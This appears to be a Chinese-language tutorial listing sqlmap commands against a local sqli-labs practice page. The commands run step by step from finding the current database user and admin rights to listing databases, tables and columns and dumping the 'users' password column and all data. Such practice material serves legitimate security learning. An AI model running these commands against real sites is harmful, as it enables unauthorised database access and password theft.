查询数据库当前用户
sqlmap -u "http://127.0.0.1/sqli-lasb/Less-1/?id=1" --current-user #查看数据库当前的用户查询当前数据库用户是否是管理员权限
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --is-dba #判断当前用户是否有管理员权限列出数据库的管理员用户名
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --roles查询所有数据库
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --dbs查询当前数据库
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --current-db输出指定数据库名字下的全部表
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security --tables输出指定数据名下指定表下的全部列
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --columns输出指定数据库指定列指定字段下的全部数据
sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security -T users -C password --dump-all系列
1、输出该数据库中全部数据
sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" --dump-all时间过长,截取选取扫描过程中的过程截图:
2、输出指定数据库中的全部数据
sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security --dump-all时间过长,截取选取扫描过程中的过程截图: